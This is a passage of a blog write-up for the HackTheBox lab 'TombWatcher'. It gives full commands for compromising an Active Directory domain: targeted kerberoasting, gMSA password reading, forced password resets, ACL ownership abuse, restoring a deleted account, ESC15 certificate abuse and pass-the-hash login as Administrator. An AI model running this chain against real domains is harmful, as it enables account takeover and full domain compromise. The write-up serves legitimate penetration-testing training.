</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260627235854.webp></figure><h3 id=bloodhound-enumeration><a href=#bloodhound-enumeration class=anchor-head aria-label=Anchor></a>Bloodhound Enumeration</h3><p>Henry have WriteSPN permission on Alfred</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628001104.webp></figure><p>Can be abused using targeted kerberoasting.</p><p>Alfred have <code>AddSelf</code> over the group<code>infrastructure</code></p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628003201.webp></figure><p>Members of <code>infrastructure</code> group have <code>ReadGMSAPassword</code> over the machine account <code>ansible_dev$</code>:</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628003825.webp></figure><p>And <code>ansible_dev$</code> have <code>ForceChangePassword</code> over user <code>sam</code>:</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628005807.webp></figure><p><code>sam</code> have <code>WriteOwner</code> over user <code>john</code></p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628010434.webp></figure><p>We can abuse this by granting ourself <code>genericAll</code>. From there we can perform three attacks to get access to <code>john</code>:</p><ol><li>Targeted kerberoasting</li><li>Shadow credentials</li><li>Force change password</li></ol><p>John is a member of <code>Remote Management Users</code> group so we can use winrm to login.</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628121356.webp></figure><p><code>john</code> also have <code>genericAll</code> over the OU <code>ADCS</code>.</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628164423.webp></figure><p>I&rsquo;m not sure how to exploit this further. So far this is the whole attack path we have figured out from bloodhound:</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628164823.webp></figure><p>So let&rsquo;s get started.</p><h2 id=attacking-alfred><a href=#attacking-alfred class=anchor-head aria-label=Anchor></a>Attacking <code>alfred</code></h2><h3 id=targeted-kerberoasting><a href=#targeted-kerberoasting class=anchor-head aria-label=Anchor></a>Targeted kerberoasting</h3><p>We have <code>WriteSPN</code> permission so we can set spn and get a TGS and try to crack it. I&rsquo;m setting the spn to <code>tombwatcher/fakesvc</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u henry -p <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> <span style=color:#fabd2f>set</span> object <span style=color:#b8bb26>&#39;Alfred&#39;</span> <span style=color:#b8bb26>&#39;servicePrincipalName&#39;</span> -v <span style=color:#b8bb26>&#39;tombwatcher/fakesvc&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628002715.webp></figure><p>Getting service ticket hash:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>GetUserSPNs.py -dc-ip DC01.tombwatcher.htb tombwatcher.htb/henry:<span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> -outputfile kerberoastables.txt -request
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628002745.webp></figure><p>Crack the password:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>hashcat -a <span style=color:#d3869b>0</span> kerberoastables.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628002945.webp></figure><p>Let&rsquo;s test the new credentials with <code>nxc</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb tombwatcher.htb -u Alfred -p <span style=color:#b8bb26>&#39;basketball&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628003058.webp></figure><p>Success!</p><h3 id=add-alfred-to-the-infrastructure-group><a href=#add-alfred-to-the-infrastructure-group class=anchor-head aria-label=Anchor></a>Add <code>alfred</code> to the <code>Infrastructure</code> group</h3><p>We can add new member to a group using <code>bloodyad</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u alfred -p <span style=color:#b8bb26>&#39;basketball&#39;</span> add groupMember Infrastructure alfred
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628004042.webp></figure><p>Then verify this by running this command:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u alfred -p <span style=color:#b8bb26>&#39;basketball&#39;</span> get membership alfred
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628004109.webp></figure><h2 id=read-gmsa-password-for-ansible_dev><a href=#read-gmsa-password-for-ansible_dev class=anchor-head aria-label=Anchor></a>Read GMSA password for <code>ansible_dev$</code></h2><p>I&rsquo;m using <a href=https://github.com/micahvandeusen/gMSADumper><code>gMSADumper.py</code></a> to read the GMSA Password:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>gmsadumper -u alfred -p basketball -d tombwatcher.htb
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628004320.webp></figure><p>Let&rsquo;s quickly check if the NTLM can be cracked:</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628004400.webp></figure><p>Turns out it&rsquo;s not, but still we can use the hash:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> nxc smb tombwatcher.htb -u <span style=color:#b8bb26>&#39;ansible_dev$&#39;</span> --aesKey <span style=color:#b8bb26>&#39;3eafb50e4a2d0982e7f8ac906387f812703bab1a23d300d5cb450639bb359f7b&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628004607.webp></figure><p>And it&rsquo;s working</p><h2 id=attacking-sam><a href=#attacking-sam class=anchor-head aria-label=Anchor></a>Attacking <code>sam</code></h2><h3 id=abusing-forcechangepassword><a href=#abusing-forcechangepassword class=anchor-head aria-label=Anchor></a>Abusing <code>ForceChangePassword</code></h3><p>Let&rsquo;s request a TGT for <code>ansible_dev$</code> first:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> getTGT.py -dc-ip DC01.tombwatcher.htb <span style=color:#b8bb26>&#39;tombwatcher/ansible_dev$&#39;</span> -aesKey <span style=color:#b8bb26>&#39;3eafb50e4a2d0982e7f8ac906387f812703bab1a23d300d5cb450639bb359f7b&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628010153.webp></figure><p>Now we can use this with <code>bloodyad</code> to reset the password of <code>sam</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>KRB5CCNAME<span style=color:#fe8019>=</span>./ansible_dev<span style=color:#b8bb26>\$</span>.ccache faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> bloodyad -d tombwatcher.htb -i $IP -k -H DC01.tombwatcher.htb -u <span style=color:#b8bb26>&#39;ansible_dev$&#39;</span> msldap changeuserpw <span style=color:#b8bb26>&#39;CN=SAM,CN=USERS,DC=TOMBWATCHER,DC=HTB&#39;</span> <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628005933.webp></figure><p>Verify the new password:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb tombwatcher.htb -u <span style=color:#b8bb26>&#39;sam&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628010307.webp></figure><h2 id=attacking-john><a href=#attacking-john class=anchor-head aria-label=Anchor></a>Attacking <code>john</code></h2><h3 id=add-ownership-for-john><a href=#add-ownership-for-john class=anchor-head aria-label=Anchor></a>Add ownership for <code>john</code></h3><p><code>sam</code> have write owner permission over user <code>john</code>. We can set <code>sam</code> as the owner using <code>bloodyad</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;sam&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> <span style=color:#fabd2f>set</span> owner john sam
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628105509.webp></figure><p>We now have <code>writeDacl</code> over <code>john</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;sam&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> get writable
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628105810.webp></figure><h3 id=granting-genericall><a href=#granting-genericall class=anchor-head aria-label=Anchor></a>Granting <code>genericAll</code></h3><p>With this we can grant user <code>sam</code> the <code>genericAll</code> permission over user <code>john</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;sam&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> add genericAll john sam
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628120902.webp></figure><h3 id=resetting-password-of-john><a href=#resetting-password-of-john class=anchor-head aria-label=Anchor></a>Resetting password of <code>john</code></h3><p>And as I mentioned before we can abuse this in three different ways, this time I&rsquo;ll change the password (not very opsec friendly):</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;sam&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> <span style=color:#fabd2f>set</span> password john <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628121108.webp></figure><p>Again verify the new credentials</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb tombwatcher.htb -u <span style=color:#b8bb26>&#39;john&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628121138.webp></figure><h3 id=shell-as-john><a href=#shell-as-john class=anchor-head aria-label=Anchor></a>Shell as <code>john</code></h3><p>Since <code>john</code> is a member of the <code>Remote Management Users</code> we can use winrm to login and get shell access:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>evil-winrm -i DC01.tombwatcher.htb -u john -p <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628121441.webp></figure><h2 id=auth-as-domain-admin><a href=#auth-as-domain-admin class=anchor-head aria-label=Anchor></a>Auth as Domain Admin</h2><h3 id=restoring-cert_admin><a href=#restoring-cert_admin class=anchor-head aria-label=Anchor></a>Restoring <code>cert_admin</code></h3><p>User john have write permission on OU <code>ADCS</code> and a deleted user <code>cert_admin</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;john&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> get writable
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628150724.webp></figure><p>After enumerating the available certificate templates, one of the template shows an SID that&rsquo;s not resolving to any user or machine account:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy find -u john@tombwatcher.htb -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> -stdout
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628150443.webp></figure><p>An object with SID <code>S-1-5-21-1392491010-1358638721-2126982587-1111</code> have enrollment rights for the <code>WebServer</code> rights. I would like to corelate this with the deleted user we saw earlier. Let&rsquo;s verify it using <code>bloodyad</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;john&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 --attr sAMAccountName,objectCategory,objectSid --base <span style=color:#b8bb26>&#39;CN=Deleted Objects,DC=tombwatcher,DC=htb&#39;</span> --filter <span style=color:#b8bb26>&#39;(isDeleted=TRUE)&#39;</span>
</span></span></code></pre></div><p>In one of the object we can see the above SID:</p><figure><img src=/img/tombwatcher/Pasted%20image%2020260628200553.webp></figure><p>Let&rsquo;s restore the deleted object:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;john&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> <span style=color:#fabd2f>set</span> restore <span style=color:#b8bb26>&#39;CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628155036.webp></figure><h3 id=changing-cert_admin-password><a href=#changing-cert_admin-password class=anchor-head aria-label=Anchor></a>Changing <code>cert_admin</code> password</h3><p>Since we have write access on <code>cert_admin</code>, we can change the password:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>bloodyad -d tombwatcher.htb -i $IP -u <span style=color:#b8bb26>&#39;john&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> <span style=color:#fabd2f>set</span> password <span style=color:#b8bb26>&#39;cert_admin&#39;</span> <span style=color:#b8bb26>&#39;Password@123&#39;</span>
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628200929.webp></figure><p>Let&rsquo;s run certipy again:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>certipy find -u cert_admin@tombwatcher.htb -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> -vulnerable -stdout
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628201057.webp></figure><p>We see that this template is vulnerable to ESC15</p><h3 id=exploiting-esc15-aka-ekuwu><a href=#exploiting-esc15-aka-ekuwu class=anchor-head aria-label=Anchor></a>Exploiting ESC15 aka &ldquo;EKUwu&rdquo;</h3><div class="alert alert-note"><div class=alert-heading-box><i class="bx bx-info-circle"></i><p class=alert-heading>About ESC15</p></div><div class=alert-content><p>Using built-in default version 1 certificate templates, an attacker can craft a CSR to include application policies that are preferred over the configured Extended Key Usage attributes specified in the template. The only requirement is enrollment rights, and it can be used to generate client authentication, certificate request agent, and codesigning certificates using the <strong><em>WebServer</em></strong> template. <a href=https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc></a></p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><p>An EKU or Extended Key Usage attribute in a template specifies what the certificate can be used for. For example, there are Server Authentication, Client Authentication, Code Signing, Email Protection, etc. Each of these is represented by its OID. OID for Client Authentication is 1.3.6.1.5.5.7.3.2. A template can be restricted to specific enrollment rights. A template used for codesigning cannot be used for client authentication. This is the assumption that&rsquo;s broken in ESC15.</p><p>This attack only works if these three things are met:</p><ol><li>Template must be using Schema Version 1</li><li>It must have EnrolleeSuppliesSubject (<code>CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT</code>) enabled</li><li>The server must be vulnerable to <code>CVE-2024-49019</code></li></ol><p>If these requirements are met, we can create a malicious CSR request and inject any application policy OID like &ldquo;Client Authentication&rdquo; and send it to the server. Even if the target template is not allowed to issue certificate for the extension we provide, the CA will not override, strip, or validate it.</p><p>There are 2 methods for exploiting this which explained well in the certipy wiki. For some reasons the first method was not working. So we&rsquo;ll exploit this using the second method.</p><p>First send a request a certificate with &ldquo;Certificate Request Agent&rdquo;, which injects the OID <code>1.3.6.1.4.1.311.20.2.1</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> certipy req -u <span style=color:#b8bb26>&#39;cert_admin@tombwatcher.htb&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> -dc-ip $IP -template WebServer -application-policies <span style=color:#b8bb26>&#34;Certificate Request Agent&#34;</span> -ca tombwatcher-CA-1 -target DC01.tombwatcher.htb -debug
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628205631.webp></figure><p>We can use the agent certificate to request a certifcate on behalf of another user, in our case the <code>Administrator</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> certipy req -u <span style=color:#b8bb26>&#39;cert_admin@tombwatcher.htb&#39;</span> -p <span style=color:#b8bb26>&#39;Password@123&#39;</span> -dc-ip $IP -template User -ca tombwatcher-CA-1 -target DC01.tombwatcher.htb -pfx cert_admin.pfx -on-behalf-of <span style=color:#b8bb26>&#39;TOMBWATCHER\Administrator&#39;</span> -debug
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628205229.webp></figure><p>Now we can use the certificate to get the hash of the <code>Administrator</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> certipy auth -pfx administrator.pfx -dc-ip $IP -debug
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628210910.webp></figure><p>We can use the hash to login via winrm and read the flag:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>evil-winrm -i DC01.tombwatcher.htb -u Administrator -H f61db423bebe3328d33af26741afe5fc
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628211108.webp></figure><hr><h3 id=references><a href=#references class=anchor-head aria-label=Anchor></a>References</h3><ul><li><a href=https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc15-arbitrary-application-policy-injection-in-v1-templates-cve-2024-49019-ekuwu>https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc15-arbitrary-application-policy-injection-in-v1-templates-cve-2024-49019-ekuwu</a></li><li><a href=https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc>https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc</a></li></ul></div></article></main><aside id=sticky-top><div class=toc-title><p>TombWatcher | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a></li><li><a href=#enumeration>Enumeration</a><ul><li><a href=#smb>SMB</a></li><li><a href=#rusthound>Rusthound</a></li><li><a href=#password-spray>Password spray</a></li><li><a href=#bloodhound-enumeration>Bloodhound Enumeration</a></li></ul></li><li><a href=#attacking-alfred>Attacking <code>alfred</code></a><ul><li><a href=#targeted-kerberoasting>Targeted kerberoasting</a></li><li><a href=#add-alfred-to-the-infrastructure-group>Add <code>alfred</code> to the <code>Infrastructure</code> group</a></li></ul></li><li><a href=#read-gmsa-password-for-ansible_dev>Read GMSA password for <code>ansible_dev$</code></a></li><li><a href=#attacking-sam>Attacking <code>sam</code></a><ul><li><a href=#abusing-forcechangepassword>Abusing <code>ForceChangePassword</code></a></li></ul></li><li><a href=#attacking-john>Attacking <code>john</code></a><ul><li><a href=#add-ownership-for-john>Add ownership for <code>john</code></a></li><li><a href=#granting-genericall>Granting <code>genericAll</code></a></li><li><a href=#resetting-password-of-john>Resetting password of <code>john</code></a></li><li><a href=#shell-as-john>Shell as <code>john</code></a></li></ul></li><li><a href=#auth-as-domain-admin>Auth as Domain Admin</a><ul><li><a href=#restoring-cert_admin>Restoring <code>cert_admin</code></a></li><li><a href=#changing-cert_admin-password>Changing <code>cert_admin</code> password</a></li><li><a href=#exploiting-esc15-aka-ekuwu>Exploiting ESC15 aka &ldquo;EKUwu&rdquo;</a></li><li><a href=#references>References</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2026-06-28</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/postman/><div class=nav-arrow>Previous in series</div><span class=post-title>Postman | HackTheBox</span></a></nav></div><nav class=post-nav><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/postman/><div class=nav-arrow>Previous</div><span class=post-title>Postman | HackTheBox</span></a></nav></div><footer class=footer><a class=footer_item href=javascript::void(0)>resume</a>
<a class=footer_item href=/index.xml>rss</a>
<span class=footer_item>&copy; 2026</span>
<small class=footer_copyright><a href=https://github.com/h4r1337/hugo-klise target=_blank rel="noreferrer noopener">hugo-klisé</a>
theme on
<a href=https://gohugo.io target=_blank rel="noreferrer noopener">Hugo</a><br><span>Made by <a href=https://github.com/h4r1337 target=_blank rel="noreferrer noopener">h4r1337</a></span></small></footer><script src=/js/main.js defer></script><script src=/js/toc.js defer></script></body></html>